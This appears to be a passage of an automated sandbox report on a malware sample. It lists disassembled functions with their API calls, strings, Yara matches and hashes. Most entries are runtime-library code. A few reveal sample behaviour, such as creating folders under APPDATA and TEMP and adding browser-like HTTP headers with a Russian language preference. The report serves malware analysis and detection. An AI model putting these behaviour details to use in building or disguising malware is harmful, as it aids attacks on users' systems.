                                                              • SleepConditionVariableCS, xrefs: 0040D058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                              • API String ID: 2565136772-3242537097
                                                              • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction ID: f37fac1021100a0b07756b465630dd6bb0a8df6e755d874f23fa7dde75435285
                                                              • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction Fuzzy Hash: C8014431B427215BDA311BB57C0DB5B76989B44B51F55403ABD08E23D4DF79880A866C
                                                              Function 0218FEAA Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC$xqC
                                                              • API String ID: 269201875-4129656487
                                                              • Opcode ID: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                              • Instruction ID: aba86f69e738d05a2f7807072f26985857a1c141887c3203db9f0f38a30342d2
                                                              • Opcode Fuzzy Hash: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                              • Instruction Fuzzy Hash: 00610672984305DFDB21EF68C8C0BAAB7F9EF48750F244069E955EB281EB70A940CF50
                                                              Function 0041FC43 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC$xqC
                                                              • API String ID: 269201875-4129656487
                                                              • Opcode ID: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                              • Instruction ID: 95aa523987b70945ec47ef040bb827334fc69fac3d8989bbbac4bd7d1d483335
                                                              • Opcode Fuzzy Hash: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                              • Instruction Fuzzy Hash: E261E5729003059FDB20DF65D841BEBB7E9EF44310F10456FE946EB281EB74AC868B99
                                                              Function 021802B9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 021803B6
                                                              • type_info::operator==.LIBVCRUNTIME ref: 021803D8
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 021804E7
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 021805B9
                                                              • _UnwindNestedFrames.LIBCMT ref: 0218063D
                                                              • CallUnexpected.LIBVCRUNTIME ref: 02180658
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                              • Instruction ID: 81db1c5f3e901886e57486c28225d0a42c0ac296c52863fc7585e954810003b5
                                                              • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                              • Instruction Fuzzy Hash: 32B17D7188121DEFCF19EF94C8C0AAEBBB6FF48314B14415AE8156B211D731DA5ACFA1
                                                              Function 00410052 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 0041014F
                                                              • type_info::operator==.LIBVCRUNTIME ref: 00410171
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00410280
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00410352
                                                              • _UnwindNestedFrames.LIBCMT ref: 004103D6
                                                              • CallUnexpected.LIBVCRUNTIME ref: 004103F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                              • Instruction ID: 33ac5f0cf36f84a5a8fc87a3d768383b9666724fdb179a46715a8f318e12c727
                                                              • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                              • Instruction Fuzzy Hash: 75B19A71800209EFCF24DFA5C9819EFBBB5BF18314B14406BE8106B252D7B9DAD1CB99
                                                              Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                              • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                              • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                              • String ID: APPDATA$TMPDIR
                                                              • API String ID: 1838500112-4048745339
                                                              • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                              • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                              • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                              • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                              Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                              Strings
                                                              • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                              • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                              • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                              • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeadersHttpRequest$H_prolog3_
                                                              • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                              • API String ID: 1254599795-787135837
                                                              • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                              • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                              • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                              • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                              Function 02188F72 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 02188F88
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 02188F94
                                                              • _free.LIBCMT ref: 02188F9F
                                                              • _free.LIBCMT ref: 02188FAA
                                                              • _free.LIBCMT ref: 02188FB5
                                                              • _free.LIBCMT ref: 02188FC0
                                                              • _free.LIBCMT ref: 02188FCB
                                                              • _free.LIBCMT ref: 02188FD6
                                                              • _free.LIBCMT ref: 02188FE1
                                                              • _free.LIBCMT ref: 02188FEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                              • Instruction ID: 496e87d5f8bbb0e2f0313c5066a0caa53ceb6c30a38dd337fbd9335af32cfeb9
                                                              • Opcode Fuzzy Hash: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                              • Instruction Fuzzy Hash: 50216876944109EFCB42FF94C8C0DDD7BBABF08350B414566A5559B221DB31DA54CF80
                                                              Function 00418D0B Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00418D21
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 00418D2D
                                                              • _free.LIBCMT ref: 00418D38
                                                              • _free.LIBCMT ref: 00418D43
                                                              • _free.LIBCMT ref: 00418D4E
                                                              • _free.LIBCMT ref: 00418D59
                                                              • _free.LIBCMT ref: 00418D64
                                                              • _free.LIBCMT ref: 00418D6F
                                                              • _free.LIBCMT ref: 00418D7A
                                                              • _free.LIBCMT ref: 00418D88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
                                                              • Instruction ID: ca178761576a792413d1c748b4aedad8a99fe24d8e3ecdc468f759f73ec23368
                                                              • Opcode Fuzzy Hash: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
                                                              • Instruction Fuzzy Hash: E121DA76A00109BFCB01EF95C891DDE7BB9FF08344F4081AAF515AB121DB35EA84CB95
                                                              Function 00424EF6 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004259BF), ref: 00424F0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                              • Instruction ID: 77fc340e961970fd7467041676d8cf64c1629d7790bb492f2f63bf2a057de4fd
                                                              • Opcode Fuzzy Hash: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                              • Instruction Fuzzy Hash: 7E518F70B0092ACBCF108F98FD481AEBBB4FF85304F918087D491A6254CB7D8966CB9D
                                                              Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                              • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                              • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2751267872-393685449
                                                              • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                              • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                              • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                              • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                              Function 0040CB99 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040CBE2
                                                              • __alloca_probe_16.LIBCMT ref: 0040CC0E
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040CC4D
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CC6A
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040CCA9
                                                              • __alloca_probe_16.LIBCMT ref: 0040CCC6
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CD08
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040CD2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                              • String ID:
                                                              • API String ID: 2040435927-0
                                                              • Opcode ID: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                              • Instruction ID: 0eef22ec5c0ed95795941b36f16f6703666d7858d80347e3b12d355d98e8a1b2
                                                              • Opcode Fuzzy Hash: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                              • Instruction Fuzzy Hash: 7851B07260020AEBEB205F65CC85FAB3BB9EF44754F15463AF914B6290DB789C05CB98
                                                              Function 0217D28B Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0217D269), ref: 0217D297
                                                              • GetModuleHandleW.KERNEL32(00429060,?,?,0217D269), ref: 0217D2A2
                                                              • GetModuleHandleW.KERNEL32(004290A4,?,?,0217D269), ref: 0217D2B3
                                                              • GetProcAddress.KERNEL32(00000000,004290C0), ref: 0217D2C5
                                                              • GetProcAddress.KERNEL32(00000000,004290DC), ref: 0217D2D3
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0217D269), ref: 0217D2F6
                                                              • RtlDeleteCriticalSection.NTDLL(004383D4), ref: 0217D312
                                                              • CloseHandle.KERNEL32(004383D0,?,?,0217D269), ref: 0217D322
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                              • String ID:
                                                              • API String ID: 2565136772-0
                                                              • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction ID: 7dcf16f5c09856e9ec6145949905142dcd236a5571ca2d9c1a44016a124679ab
                                                              • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction Fuzzy Hash: D40152717827259BDB311B74BC0DB6B76A89F88F41B55402ABD04E2290EFB5C8068A6C
                                                              Function 02188423 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • _free.LIBCMT ref: 0218870E
                                                              • _free.LIBCMT ref: 02188727
                                                              • _free.LIBCMT ref: 02188765
                                                              • _free.LIBCMT ref: 0218876E
                                                              • _free.LIBCMT ref: 0218877A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast
                                                              • String ID: PrC
                                                              • API String ID: 3291180501-1629617404
                                                              • Opcode ID: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                              • Instruction ID: 483dcd9d4128a1275580eaa6bab69ae5d4a4b3751640ca5d5d3dbe3f7f69216b
                                                              • Opcode Fuzzy Hash: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                              • Instruction Fuzzy Hash: C1B12B7594121ADFDB25EF18C8C4BA9B7B5FF48314F9145AAD849A7350D730AE90CF80
                                                              Function 0041B94A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 0041B9CE
                                                              • __alloca_probe_16.LIBCMT ref: 0041BA94
                                                              • __freea.LIBCMT ref: 0041BB00
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              • __freea.LIBCMT ref: 0041BB09
                                                              • __freea.LIBCMT ref: 0041BB2C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID: uA
                                                              • API String ID: 1423051803-3888042258
                                                              • Opcode ID: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                              • Instruction ID: ced852eb499a8acaff1ad66fc4d965fe1516489bf7db7eeb17bdd08576ef726b
                                                              • Opcode Fuzzy Hash: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                              • Instruction Fuzzy Hash: 5151B272500216AFDB219F66CC81EFF3AA9EF44754F25012AFD04A7240EB39DD9186E8
                                                              Function 00403D20 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403DA3
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403DEF
                                                              • __Getctype.LIBCPMT ref: 00403E08
                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00403E24
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403EB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 1840309910-1405518554
                                                              • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction ID: 735bfd9e15749c96a7d30fe23bfbaee7cab1fe25536061823035921e9fb647b7
                                                              • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction Fuzzy Hash: E25180B1D003489BDF10DFA5D8457CEBBB8AF14315F14426AEC15BB381E779AA08C799
                                                              Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __RTC_Initialize.LIBCMT ref: 1000291D
                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                              • String ID:
                                                              • API String ID: 2442719207-0
                                                              • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                              • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                              • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                              • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                              Function 0040FB20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FB57
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0040FB5F
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FBE8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0040FC13
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FC68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction ID: feac5375391b8ac6f8c542b9474111b56147410f227dd59f06f236b9ab0aef11
                                                              • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction Fuzzy Hash: DB41B834A002089BCF20DF69C891A9E7BB4BF44358F14807BE8156B7D2D779EA59CF94
                                                              Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003A57
